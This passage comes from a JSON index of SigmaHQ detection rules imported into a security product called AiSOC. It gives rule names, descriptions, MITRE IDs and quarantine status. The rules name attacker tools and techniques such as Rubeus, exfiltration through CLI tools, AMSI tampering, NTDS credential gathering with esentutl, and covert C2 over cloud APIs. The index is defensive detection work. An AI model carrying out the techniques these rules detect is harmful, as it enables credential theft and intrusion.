Commandlets - PoshModule", "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1087", "T1087.001", "T1087.002", "T1069.001", "T1069.002", "T1069", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-commandlets-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "type": "detection", "name": "Potential Data Exfiltration Activity Via CommandLine Tools", "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-data-exfiltration-activity-via-commandline-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml" } }, { "id": "sigmahq-sigma-7d416556-6502-45b2-9bad-9d2f05f38997", "type": "detection", "name": "Powershell Sensitive File Discovery", "description": "Detect adversaries enumerate sensitive files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-sensitive-file-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d416556-6502-45b2-9bad-9d2f05f38997", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" } }, { "id": "sigmahq-sigma-7d4aaec2-08ed-4430-8b96-28420e030e04", "type": "detection", "name": "Uncommon Sigverif.EXE Child Process", "description": "Detects uncommon child processes spawning from \"sigverif.exe\", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-sigverif-exe-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d4aaec2-08ed-4430-8b96-28420e030e04", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-7d4cdc5a-0076-40ca-aac8-f7e714570e47", "type": "detection", "name": "CMSTP Execution Process Creation", "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-execution-process-creation.yaml", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml" } }, { "id": "sigmahq-sigma-7d604714-e071-49ff-8726-edeb95a70679", "type": "detection", "name": "Legitimate Application Dropped Script", "description": "Detects programs on a Windows system that should not write scripts to disk", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/legitimate-application-dropped-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d604714-e071-49ff-8726-edeb95a70679", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml" } }, { "id": "sigmahq-sigma-7d6d30b8-5b91-4b90-a891-46cccaf29598", "type": "detection", "name": "Program Executed Using Proxy/Local Command Via SSH.EXE", "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/program-executed-using-proxy-local-command-via-ssh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml" } }, { "id": "sigmahq-sigma-7d9263bd-dc47-4a58-bc92-5474abab390c", "type": "detection", "name": "Change Winevt Channel Access Permission Via Registry", "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to Windows event channel.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-winevt-channel-access-permission-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d9263bd-dc47-4a58-bc92-5474abab390c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" } }, { "id": "sigmahq-sigma-7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "type": "detection", "name": "Scripted Diagnostics Turn Off Check Enabled - Registry", "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scripted-diagnostics-turn-off-check-enabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" } }, { "id": "sigmahq-sigma-7dbbcac2-57a0-45ac-b306-ff30a8bd2981", "type": "detection", "name": "Windows AMSI Related Registry Tampering Via CommandLine", "description": "Detects tampering of AMSI (Anti-Malware Scan Interface) related registry values via command line tools such as reg.exe or PowerShell.\nAMSI provides a generic interface for applications and services to integrate with antimalware products.\nAdversaries may disable AMSI to evade detection of malicious scripts and code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-amsi-related-registry-tampering-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7dbbcac2-57a0-45ac-b306-ff30a8bd2981", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_amsi_registry_tampering.yml" } }, { "id": "sigmahq-sigma-7dc2dedd-7603-461a-bc13-15803d132355", "type": "detection", "name": "Uncommon Child Process Of Conhost.EXE", "description": "Detects uncommon \"conhost\" child processes. This could be a sign of \"conhost\" usage as a LOLBIN or potential process injection activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-conhost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7dc2dedd-7603-461a-bc13-15803d132355", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml" } }, { "id": "sigmahq-sigma-7df1713a-1a5b-4a4b-a071-dc83b144a101", "type": "detection", "name": "Esentutl Gather Credentials", "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esentutl-gather-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_esentutl_params.yml" } }, { "id": "sigmahq-sigma-7e3c4651-c347-40c4-b1d4-d48590fdf684", "type": "detection", "name": "Code Injection by ld.so Preload", "description": "Detects the ld.so preload persistence file. 
See `man ld.so` for more information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/code-injection-by-ld-so-preload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e3c4651-c347-40c4-b1d4-d48590fdf684", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_ldso_preload_injection.yml" } }, { "id": "sigmahq-sigma-7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "type": "detection", "name": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-internet-hosted-webdav-share-mount-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml" } }, { "id": "sigmahq-sigma-7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f", "type": 
"detection", "name": "PowerShell Web Access Feature Enabled Via DISM", "description": "Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-web-access-feature-enabled-via-dism.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e8f2d3b-9c1a-4f67-b9e8-8d9006e0e51f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dism_enable_powershell_web_access_feature.yml" } }, { "id": "sigmahq-sigma-7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - System", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml" } }, { "id": "sigmahq-sigma-7e9cf7b6-e827-11ed-a05b-0242ac120003", "type": "detection", "name": "Suspicious Non-Browser Network Communication With Google API", "description": "Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-non-browser-network-communication-with-google-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e9cf7b6-e827-11ed-a05b-0242ac120003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml" } }, { "id": "sigmahq-sigma-7e9cf7b6-e827-11ed-a05b-15959c120003", "type": "detection", "name": "Potentially Suspicious Network Connection To Notion API", "description": "Detects a non-browser process communicating with the Notion API. 
This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-network-connection-to-notion-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7e9cf7b6-e827-11ed-a05b-15959c120003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_notion_api_susp_communication.yml" } }, { "id": "sigmahq-sigma-7ea78478-a4f9-42a6-9dcd-f861816122bf", "type": "detection", "name": "Disabled MFA to Bypass Authentication Mechanisms", "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabled-mfa-to-bypass-authentication-mechanisms.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ea78478-a4f9-42a6-9dcd-f861816122bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/azure/activity_logs/azure_mfa_disabled.yml" } }, { "id": "sigmahq-sigma-7ec15688-fd24-4177-ba43-1a950537ee39", "type": "detection", "name": "The Windows Defender Firewall Service Failed To Load Group Policy", "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/the-windows-defender-firewall-service-failed-to-load-group-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ec15688-fd24-4177-ba43-1a950537ee39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml" } }, { "id": "sigmahq-sigma-7ec2c172-dceb-4c10-92c9-87c1881b7e18", "type": "detection", "name": "HackTool - Rubeus Execution", "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003", "T1558.003", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-rubeus-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml" } }, { "id": "sigmahq-sigma-7ed2c9f7-c59d-4c82-a7e2-f859aa676099", "type": "detection", "name": "Suspicious MacOS Firmware Activity", "description": "Detects when a user manipulates the Firmware Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-macos-firmware-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" } }, { "id": "sigmahq-sigma-7ee0b4aa-d8d4-4088-b661-20efdf41a04c", "type": "detection", "name": "Azure Kubernetes Secret or Config Object Access", "description": "Identifies when a Kubernetes account accesses sensitive objects such as configmaps or secrets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-secret-or-config-object-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml" } }, { "id": "sigmahq-sigma-7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "type": "detection", "name": "Invoke-Obfuscation COMPRESS OBFUSCATION", "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-compress-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" } }, { "id": "sigmahq-sigma-7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "type": "detection", "name": "AgentExecutor PowerShell Execution", "description": "Detects execution of the AgentExecutor.exe binary. 
It can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by the 6th positional argument", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/agentexecutor-powershell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml" } }, { "id": "sigmahq-sigma-7eff1a7f-dd45-4c20-877a-f21e342a7611", "type": "detection", "name": "RemCom Service File Creation", "description": "Detects the default RemCom service filename, which indicates RemCom service installation and execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remcom-service-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7eff1a7f-dd45-4c20-877a-f21e342a7611", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/file/file_event/file_event_win_remcom_service.yml" } }, { "id": "sigmahq-sigma-7f103213-a04e-4d59-8261-213dddf22314", "type": "detection", "name": "MSSQL XPCmdshell Suspicious Execution", "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-xpcmdshell-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f103213-a04e-4d59-8261-213dddf22314", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml" } }, { "id": "sigmahq-sigma-7f2376f9-42ee-4dfc-9360-fecff9a88fc8", "type": "detection", "name": "BitLockerTogo.EXE Execution", "description": "Detects the execution of \"BitLockerToGo.EXE\".\nBitLocker To Go is BitLocker Drive Encryption on removable data drives. 
This feature includes the encryption of USB flash drives, SD cards, external hard disk drives, and other drives that are formatted using the NTFS, FAT16, FAT32, or exFAT file system.\nThis is a rarely used application, and any usage of it is worth investigating.\nMalware such as Lumma stealer has been seen using this process as a target for process hollowing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitlockertogo-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f2376f9-42ee-4dfc-9360-fecff9a88fc8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml" } }, { "id": "sigmahq-sigma-7f2954d2-99c2-4d42-a065-ca36740f187b", "type": "detection", "name": "Hypervisor Enforced Paging Translation Disabled", "description": "Detects changes to the \"DisableHypervisorEnforcedPagingTranslation\" registry value. 
Specifically, where it is set to \"1\" in order to disable the Hypervisor Enforced Paging Translation feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hypervisor-enforced-paging-translation-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f2954d2-99c2-4d42-a065-ca36740f187b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml" } }, { "id": "sigmahq-sigma-7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "type": "detection", "name": "Split A File Into Pieces", "description": "Detects use of the command \"split\" to split files into parts for possible transfer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/split-a-file-into-pieces.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" } }, { "id": 
